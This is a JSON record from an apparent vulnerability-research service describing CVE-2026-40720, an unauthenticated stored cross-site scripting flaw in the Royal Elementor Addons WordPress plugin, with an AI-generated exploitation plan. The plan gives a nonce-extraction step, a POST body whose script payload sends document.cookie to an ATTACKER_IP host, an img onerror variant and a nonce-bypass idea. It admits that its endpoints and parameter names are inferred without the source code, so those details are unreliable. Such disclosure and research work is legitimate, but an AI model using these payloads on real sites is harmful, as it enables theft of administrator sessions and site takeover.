[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwhGy2x_YFATMnIu_AalBCIUTCVEMADeXJRl9aEsrsBY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":31},"CVE-2026-40720","royal-elementor-addons-pro-unauthenticated-stored-cross-site-scripting","Royal Elementor Addons \u003C 1.7.1041 - Unauthenticated Stored Cross-Site Scripting","The Royal Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to 1.7.1041 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","royal-elementor-addons",null,"\u003C1.7.1041","1.7.1041","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-16 00:00:00","2026-05-21 20:49:38",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F39075385-f8b8-4f40-9ec1-8f9f8d2bee0c?source=api-prod",36,[],"researched",false,3,"This research plan focuses on **CVE-2026-40720**, a Stored Cross-Site Scripting vulnerability in Royal Elementor Addons Pro. Since the source files were not provided, this plan is based on the vulnerability description and common architectural patterns found in Royal Elementor Addons (WPR).\n\n---\n\n### 1. Vulnerability Summary\nThe **Royal Elementor Addons Pro** plugin fails to adequately sanitize and escape user-supplied data submitted via an unauthenticated endpoint. This data is stored in the database (likely as a form submission, lead, or log entry) and subsequently rendered in the WordPress administrative dashboard or a frontend page without proper output escaping (e.g., using `esc_html()`). An unauthenticated attacker can inject a malicious `\u003Cscript>` payload that executes when an administrator views the stored data.\n\n### 2. Attack Vector Analysis\n*   **Vulnerable Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Vulnerable AJAX Action:** `wpr_addons_contact_form_submit` (inferred based on plugin features) or a similar handler for the \"Contact Form\" or \"Forms\" widget.\n*   **HTTP Parameter:** Typically `wpr_contact_form_message` or a field index like `field_1`, `field_2`, etc.\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:** A page must exist containing a Royal Elementor \"Contact Form\" or \"Lead\" widget.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=wpr_addons_contact_form_submit`.\n2.  **Processing:** The plugin's AJAX handler (likely in `modules\u002Fforms\u002F` or `classes\u002Fwpr-ajax-handler.php`) receives the input.\n3.  **Storage:** The input is saved using `add_post_meta()` (as a submission CPT) or inserted into a custom table (e.g., `{$wpdb->prefix}wpr_submissions`) without rigorous sanitization (missing `wp_kses()` or `sanitize_text_field()`).\n4.  **Sink:** An administrator visits the \"Royal Addons -> Submissions\" (or similar) menu in the dashboard. The plugin retrieves the data and echoes it directly into the HTML table\u002Fview without `esc_html()`.\n\n### 4. Nonce Acquisition Strategy\nRoyal Elementor Addons Pro typically localizes AJAX configuration data for its widgets.\n\n1.  **Identify Shortcode:** The relevant widget is the \"Contact Form\".\n2.  **Setup:** Create a test page containing the Royal Contact Form.\n    ```bash\n    # Create page with Royal Contact Form widget (represented via shortcode\u002Fblock)\n    wp post create --post_type=page --post_title=\"Contact Test\" --post_status=publish --post_content='[wpr-contact-form id=\"123\"]'\n    ```\n3.  **Navigate:** Use `browser_navigate` to visit the newly created page.\n4.  **Extraction:** Use `browser_eval` to extract the nonce.\n    *   **Candidate JS Object:** `WPRConfig` or `WPR_Addons_Data`.\n    *   **Candidate Key:** `ajax_nonce` or `nonce`.\n    *   **Command:** `browser_eval(\"window.WPRConfig?.ajax_nonce\")`\n\n### 5. Exploitation Strategy\n\n#### Step 1: Reconnaissance\nLocate the AJAX action and nonce key by inspecting the page source of a page containing a Royal form. Search for `wp_localize_script` output.\n\n#### Step 2: Payload Injection\nSubmit the malicious payload via the `http_request` tool.\n\n*   **URL:** `https:\u002F\u002FTARGET\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=wpr_addons_contact_form_submit&\n    nonce=[EXTRACTED_NONCE]&\n    wpr_contact_form_name=Attacker&\n    wpr_contact_form_email=attacker@evil.com&\n    wpr_contact_form_message=\u003Cscript>alert(document.domain);fetch('http:\u002F\u002FATTACKER_IP\u002Flog?c='+document.cookie);\u003C\u002Fscript>\n    ```\n\n#### Step 3: Triggering the XSS\nThe payload is now stored. To execute it:\n1.  Log in as an Administrator.\n2.  Navigate to the submissions management page: `\u002Fwp-admin\u002Fadmin.php?page=wpr-submissions` (inferred).\n3.  The browser will execute the script upon rendering the list of submissions.\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `wpr-addons-pro` (version \u003C 1.7.1041) is active.\n2.  **Create Form:** Use the Elementor editor to add a \"Royal Contact Form\" to a page. If using CLI:\n    ```bash\n    wp post create --post_type=page --post_title=\"Exploit Page\" --post_status=publish --post_content='\u003C!-- wp:royal-elementor-addons\u002Fcontact-form \u002F-->'\n    ```\n3.  **Capture ID:** Note the Post ID to navigate to it for nonce extraction.\n\n### 7. Expected Results\n*   **Response to Injection:** The AJAX request should return a success message (e.g., `{\"success\":true}`).\n*   **Database State:** The `wp_postmeta` or custom submission table will contain the raw `\u003Cscript>` tag.\n*   **Execution:** When viewing the submission in the admin panel, an alert box appearing or a network request to an external server confirms XSS.\n\n### 8. Verification Steps\n1.  **Check Database:** Use WP-CLI to verify the payload is stored unescaped.\n    ```bash\n    # Search for the payload in postmeta (if stored as CPT)\n    wp db query \"SELECT meta_value FROM wp_postmeta WHERE meta_value LIKE '%\u003Cscript>%';\"\n    \n    # Or search the custom table (adjust table name based on discovery)\n    wp db query \"SELECT * FROM wp_wpr_submissions WHERE message LIKE '%\u003Cscript>%';\"\n    ```\n2.  **Verify Admin UI:** Use `browser_navigate` to the submissions page and check for the injected script in the DOM.\n\n### 9. Alternative Approaches\n*   **Lead Generation Widget:** If the Contact Form isn't the entry point, check the \"Lead Popups\" or \"Subscription\" widgets, which use similar logic for capturing unauthenticated user data.\n*   **Tracking Parameters:** Check if the plugin logs unauthenticated URL parameters (like UTM tags) into an admin dashboard view.\n*   **Different Payloads:** Use an `\u003Cimg>` tag with `onerror` if `\u003Cscript>` tags are partially filtered:\n    ```html\n    \u003Cimg src=x onerror=\"alert(1)\">\n    ```\n*   **Bypass Nonce:** Check if the `wpr_addons_contact_form_submit` handler (or similar) calls `check_ajax_referer` with the third argument `$die` set to `false`, effectively ignoring the result of the nonce check.","The Royal Elementor Addons Pro plugin for WordPress is vulnerable to unauthenticated stored Cross-Site Scripting (XSS) via its contact form and lead generation widgets. Attackers can submit malicious scripts through unauthenticated AJAX form handlers, which are stored in the database and executed when an administrator views the submissions in the WordPress dashboard.","1. Identify a page containing a Royal Elementor Addons 'Contact Form' or 'Lead' widget.\n2. Extract the AJAX nonce from the localized JavaScript configuration object (usually 'WPRConfig' or 'WPR_Addons_Data') present on the page.\n3. Send a POST request to 'wp-admin\u002Fadmin-ajax.php' with the action 'wpr_addons_contact_form_submit' (or a similar form handler action).\n4. Include the extracted nonce and a malicious script payload (e.g., \u003Cscript>alert(1)\u003C\u002Fscript>) in a form field parameter such as 'wpr_contact_form_message'.\n5. Wait for an administrator to view the 'Submissions' management page in the WordPress dashboard, at which point the stored script will execute in their session context.","gemini-3-flash-preview","2026-04-27 14:28:32","2026-04-27 14:28:54",{"type":32,"vulnerable_version":33,"fixed_version":9,"vulnerable_browse":34,"vulnerable_zip":35,"fixed_browse":9,"fixed_zip":9,"all_tags":36},"plugin","1.7.1037","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1037","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1037.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags"]